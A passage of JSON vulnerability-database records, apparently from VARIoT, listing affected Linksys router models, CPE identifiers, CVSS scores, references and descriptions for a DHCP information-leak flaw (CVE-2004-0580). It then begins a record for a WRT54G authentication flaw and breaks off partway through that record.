"vendor": "linksys",
"version": "*"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.38.5"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.45.7"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.42.7.1"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.40.3f"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.37"
},
{
"model": "rv082",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.00.8"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.35"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "befsr41w",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsr81",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.44"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.39"
},
{
"model": "befvp41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.39.64"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "befsru31",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "befcmu10",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "befsr41",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "1.36"
},
{
"model": "befcmu10",
"scope": null,
"trust": 0.9,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
},
{
"model": "befn2ps4",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
},
{
"model": "rv082",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befvp41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39.64"
},
{
"model": "etherfast befvp41 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.44"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.42.7"
},
{
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.42.7.1"
},
{
"model": "etherfast befsr81 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.45.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.38"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.37"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.36"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.35"
},
{
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.38.5"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.7"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"model": "etherfast befn2ps4 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befvp41 .3f",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40"
},
{
"model": "befsr81",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "befsr41w",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"model": "etherfast befsr41 router",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "1.05.00"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:1.40.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befcmu10:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.40.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wap55ag:1.0.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr81:2.42.7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr81:2.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:1.39.64:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41w:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.40.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.45.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.41:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.43.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.43:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.43:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.36:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.44.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.43:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.35:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.43.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.43.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.41:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.44:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsx41:1.45.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.43:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befn2ps4:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befvp41:1.40.3f:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befn2ps4:1.42.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:rv082:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:1.42.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.00.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.38.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.40.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.39:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsru31:1.43.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr11:1.41:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr81:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.37:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41:1.43.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0580"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jon Hart\u203b warchild@spoofed.org",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0580",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9010",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0580",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200408-030",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-9010",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9010"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DHCP on Linksys BEFSR11, BEFSR41, BEFSR81, and BEFSRU31 Cable/DSL Routers, firmware version 1.45.7, does not properly clear previously used buffer contents in a BOOTP reply packet, which allows remote attackers to obtain sensitive information. Linksys has a variety of network equipment product lines. \n\n\u00a0Multiple Linksys devices have problems processing DHCP messages. Remote attackers can use this vulnerability to obtain sensitive information or conduct denial of service attacks on the device. \n\n\u00a0The built-in DHCP server of these devices has a security vulnerability. The DHCP server of these devices incorrectly processes BOOTP packets. When returning a BOOTP response, it copies some of the contents of its memory into the BOOTP fields, so an attacker can obtain sensitive information by sniffing network communications. An attacker can also use the issue to cause a denial of service on the device. When attempting to exploit this issue, it has been reported that a denial of service condition may occur, stopping legitimate users from using the device",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "VULHUB",
"id": "VHN-9010"
}
],
"trust": 1.8
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9010",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9010"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-0580",
"trust": 2.6
},
{
"db": "BID",
"id": "10329",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "6325",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1010288",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "11606",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2004-1417",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040607 LINKSYS BEFSR41 DHCP VULNERABILITY SERVER LEAKS NETWORK DATA",
"trust": 0.6
},
{
"db": "XF",
"id": "16142",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-77851",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "24115",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9010",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"db": "VULHUB",
"id": "VHN-9010"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"id": "VAR-200408-0079",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9010"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T13:31:00.424000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0580"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/10329"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/6325"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/alerts/2004/may/1010288.html"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/11606"
},
{
"trust": 1.6,
"url": "http://linksys.custhelp.com/cgi-bin/linksys.cfg/php/enduser/std_adp.php?p_faqid=832\u0026p_%20%5ccreated=1086294093\u0026p_sid=pu1x1idh\u0026p_lva=\u0026p_sp=cf9zcmnopszwx3nvcnrfynk9jnbfz3jpzhnvcnq9%20%5cjnbfcm93x2nudd02ntqmcf9wywdlpte%2a\u0026p_li="
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16142"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=108662876129301\u0026w=2"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/16142"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108662876129301\u0026w=2"
},
{
"trust": 0.3,
"url": "http://linksys.custhelp.com/cgi-bin/linksys.cfg/php/enduser/std_adp.php?p_faqid=832\u0026p_created=1086294093\u0026p_sid=pu1x1idh\u0026p_lva=\u0026p_sp=cf9zcmnopszwx3nvcnrfynk9jnbfz3jpzhnvcnq9jnbfcm93x2nudd02ntqmcf9wywdl"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/group.asp?grid=23"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/"
},
{
"trust": 0.3,
"url": "/archive/1/365319"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108662876129301\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://linksys.custhelp.com/cgi-bin/linksys.cfg/php/enduser/std_adp.php?p_faqid=832\u0026amp;p_%20%5ccreated=1086294093\u0026amp;p_sid=pu1x1idh\u0026amp;p_lva=\u0026amp;p_sp=cf9zcmnopszwx3nvcnrfynk9jnbfz3jpzhnvcnq9%20%5cjnbfcm93x2nudd02ntqmcf9wywdlpte%2a\u0026amp;p_li="
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9010"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"db": "VULHUB",
"id": "VHN-9010"
},
{
"db": "BID",
"id": "10329"
},
{
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"date": "2004-08-06T00:00:00",
"db": "VULHUB",
"id": "VHN-9010"
},
{
"date": "2004-05-13T00:00:00",
"db": "BID",
"id": "10329"
},
{
"date": "2004-08-06T04:00:00",
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"date": "2004-05-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2004-1417"
},
{
"date": "2018-08-13T00:00:00",
"db": "VULHUB",
"id": "VHN-9010"
},
{
"date": "2015-03-19T09:44:00",
"db": "BID",
"id": "10329"
},
{
"date": "2023-11-07T01:56:43.640000",
"db": "NVD",
"id": "CVE-2004-0580"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple Linksys Device DHCP Information Leaks and Denial of Service Vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1417"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "10329"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-030"
}
],
"trust": 0.9
}
}
VAR-200509-0095
Vulnerability from variot - Updated: 2023-12-18 13:26
ezconfig.asp in Linksys WRT54G router 3.01.03, 3.03.6, non-default configurations of 2.04.4, and possibly other versions, does not use an authentication initialization function, which allows remote attackers to obtain encrypted configuration information and, if the key is known, modify the configuration. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0095",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.04.4"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
